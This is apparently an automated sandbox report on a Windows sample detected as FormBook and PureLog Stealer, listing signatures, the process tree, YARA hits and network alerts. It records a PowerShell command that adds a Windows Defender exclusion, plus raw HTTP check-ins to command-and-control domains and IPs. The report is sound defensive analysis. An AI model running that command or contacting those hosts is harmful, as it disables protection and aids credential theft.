Windows Analysis Report
IETC-24017.exe

Overview

General Information

Sample name: IETC-24017.exe
Analysis ID: 1562159
MD5: 2d9da996ec68d0ac26b84d52a3298383
SHA1: 730f898be0b7296a0b554889567e97eef497b7b6
SHA256: c5523d6938b41d9f2b512ca472f570145539087597f4f31e3e62060e88b03c48
Tags: exe, user-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • IETC-24017.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\IETC-24017.exe" MD5: 2D9DA996EC68D0AC26B84D52A3298383)
    • powershell.exe (PID: 1748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • IETC-24017.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\IETC-24017.exe" MD5: 2D9DA996EC68D0AC26B84D52A3298383)
      • UFUUPGsATdE.exe (PID: 3164 cmdline: "C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 7400 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • firefox.exe (PID: 7732 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.IETC-24017.exe.6d90000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.IETC-24017.exe.371e790.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.IETC-24017.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.IETC-24017.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.IETC-24017.exe.6d90000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IETC-24017.exe", ParentImage: C:\Users\user\Desktop\IETC-24017.exe, ParentProcessId: 5296, ParentProcessName: IETC-24017.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", ProcessId: 1748, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\IETC-24017.exe", ParentImage: C:\Users\user\Desktop\IETC-24017.exe, ParentProcessId: 5296, ParentProcessName: IETC-24017.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe", ProcessId: 1748, ProcessName: powershell.exe

                      AV Detection

                      Source: IETC-24017.exe, ReversingLabs: Detection: 42%
                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: IETC-24017.exe, Joe Sandbox ML: detected
                      Source: IETC-24017.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: IETC-24017.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: WyjV.pdb source: IETC-24017.exe
                      Source: Binary string: OpnFiles.pdb source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UFUUPGsATdE.exe, 00000006.00000002.4124119366.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IETC-24017.exe, IETC-24017.exe, 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000003.1822081128.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.1824349392.0000000004789000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: OpnFiles.pdbGCTL source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000003.1908291913.0000000001232000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WyjV.pdbSHA256H source: IETC-24017.exe
                      Source: C:\Windows\SysWOW64\openfiles.exe, Code function: 7_2_007AC810 FindFirstFileW, FindNextFileW, FindClose (7_2_007AC810)
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe, Code function: 4x nop then mov esp, ebp (6_2_07CB9E2F)
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe, Code function: 4x nop then xor eax, eax (6_2_07CBFD4D)
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe, Code function: 4x nop then pop edi (6_2_07CBA4BC)
                      Source: C:\Windows\SysWOW64\openfiles.exe, Code function: 4x nop then xor eax, eax (7_2_00799F20)
                      Source: C:\Windows\SysWOW64\openfiles.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_048404E8)

                      Networking

                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 104.21.16.206:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49776 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 74.48.143.82:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 185.27.134.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49830 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49848 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 212.123.41.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49810 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49887 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49872 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 206.238.89.119:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49923 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49941 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49948 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49961 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49881 -> 172.67.223.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49986 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49954 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49915 -> 172.67.186.192:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49999 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49993 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49978 -> 43.199.54.158:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 209.74.77.108:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 107.167.84.42:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 77.68.64.45:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 163.44.185.183:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 185.27.134.206:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 217.160.0.200:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 107.167.84.42:80
                      Source: DNS query: www.amayavp.xyz
                      Source: DNS query: www.izmirescortg.xyz
                      Source: DNS query: www.030002613.xyz
                      Source: Joe Sandbox View, IP Address: 212.123.41.108
                      Source: Joe Sandbox View, IP Address: 185.27.134.144
                      Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox View, ASN Name: EPAG-ASDE
                      Source: Joe Sandbox View, ASN Name: WILDCARD-ASWildcardUKLimitedGB
                      Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.airrelax.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5PXCDqoRSfvUw6rLDaKlN9Kt5+gU7jSjDaWWRyTQ8pSIxkDCsHDSL4=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.amayavp.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bpgroup.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.127358.winConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.caj-bioteaque.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.ssrpidemt-soar.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.izmirescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.030002613.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.327531.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.urbanfashion.websiteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.canadavinreport.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
